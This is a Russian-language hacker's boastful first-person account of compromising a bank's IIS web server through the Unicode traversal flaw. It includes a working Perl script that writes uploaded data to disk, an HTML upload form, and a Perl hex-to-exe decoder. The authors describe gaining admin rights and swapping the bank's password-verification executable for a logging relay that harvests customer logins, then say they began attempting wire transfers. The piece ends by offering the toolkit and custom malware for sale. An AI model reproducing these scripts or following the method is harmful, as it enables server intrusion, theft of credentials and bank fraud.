...
А в этот момент на Unicode было
просканено много IIS'ок. Мы нашли много чего
интересного. Особенно нас порадовал банк.
Но нам все было мало. Стандартно баз не
наблюдалось, попытка поюзать TFTP
провалилась, залили FTP скрипт через наш софт,
который делает декодировку и пропускает (значки
">",">>" и другие). Короче, через
наш софт мы залили батник одним POST'ом с FTP
скриптом, и опять пролетела розовая птица
ОБЛОМИНГО и вцепилась своими нежными
лапками, и не отпускала. Мы поплакались друг
другу в жилетку, вытерли сопли с монитора и
поехали дальше. Попробовали сделать traceroute с
удаленной машины. Эффект нулевой. Вывод
один - там Firewall. Мы взяли еще пива... При более
внимательном досмотре(сайта) был обнаружен
Perl. Юзая всё тот же софт и ту же ECHO мы залили
интересный Perl'овый скрипт
print "Content-type: text/html \n\n";
read(STDIN, $data, $ENV{"CONTENT_LENGTH"});
$data =~ s/text\=//g;
$data =~ s/\+/ /g;
$data =~ s/(..)/pack("c",hex($1))/ge;
if (open(MF,">c:\\место куда льём\\имя
файла")) {
print MF "$data";
close (MF);
}
И сделали замечательную
формочку под него.
<form action="http://unicode бла бла бла
c место
perl'a"/perl.exe?c:\"место где лежит
скрипт"\qip_and_n1kon.pl" method=post>
<textarea name=text rows=20 cols=85></textarea>
<!-- input type=file name=text -->
<br>
<input type=submit value=Send> <input type=reset
value=Clear>
</form>
Проблема состояла в том, что
обращение на отправку пароля на сайте банка
шло в exe файл. Родилась мысль сделать некий
"ретранслятор", которым мы заменили бы
существующий exe файл на свой ретранслятор,
который перекачивал бы входящую в него инфу
в реальный exe файл и откладывал лог
передаваемой информации. Мы написали его...
Но встала проблема в заливке файла
ретранслятора на сайт (если кто знает, как
образован exe'шник, то они бы поняли, что его
нельзя отправить в простом текстовом виде).
Появилась очередная мысль, и решили мы exe'шник
перевести в 16'ричную систему счисления (пример:
2 символа начала exe файла(MZ) 4Dx5A) "x" это
разделитель между символами exe'шника для
большего удобства декодировки. Затем был
сделан декодировщик (проклятье, что-то пиво
плохо открывается Ж)))....... открылось......
поехали дальше..... )
open(F, "c:\\место куда слили\\имя
файла");
#open(F, "qqq.txt");
@ccs=<F>;
close(F);
undef($/);
open(F, ">c:\\место куда слили\\имя
файла");
#open(F, ">имя декодированного
файла.exe");
binmode(F);
foreach (@ccs) {
chop;
@uu=split(/x/);
foreach(@uu) {
$_ =~ s/(..).?/pack("C",hex($1))/eg;
print F $_;
}
}
close(F);
Вот мы залили наш ретранслятор
и декодировали его в exe. Хотели было
заменить (как выше указывалось понятно что
на что), но опять обломались, не хватило
Permission'a, надо было получать админа... Чтобы
получить админа надо было знать, какой
стоит Service Pack на системе... С этим успешно
справилась программа psinfo... Элементарным
поиском было найдено (как в книжке 1000 и 1
ночь) 1000 и 1 вариант получения админа.
Воспользовавшись одним из вариантов(тем
который не требовал restart'a машины) были
успешно получены права администратора (кроткий
звук открытия пробки). Затем, действуя по
плану, мы заменили все тот же exe'шник на свой (для
тех кто еще не воткнул - базы на этой машине
в принципе не было, поэтому мы так увязались
за этот exe'шник, т.к именно он обращался на
внутренний сервер для верификации пароля)
.... спустя n'ое количество времени IMHO мы
считали, что все будет работать, и мы получим
пароли и логины к счетам.... Что и произошло
спустя все тоже n'ое количество времени. На
данный момент мы начали пробовать первые
отправки ваеров на наши счета.
P.S. Если кому нужен полный пакет
софта, которым мы пользовались, мы с
удовольствием вам предоставим его за n-ую
сумму 🙂 Так же можете обращаться по
вопросам написания софта на заказ.
Не скучайте.
АВТОРЫ И СОУЧАСТНИКИ )))))
qip - icq 6666666 - mail: internet@pisem.net
N1K0N - icq 500856 - mail: n1kon@slipd.com
adios muchachos )))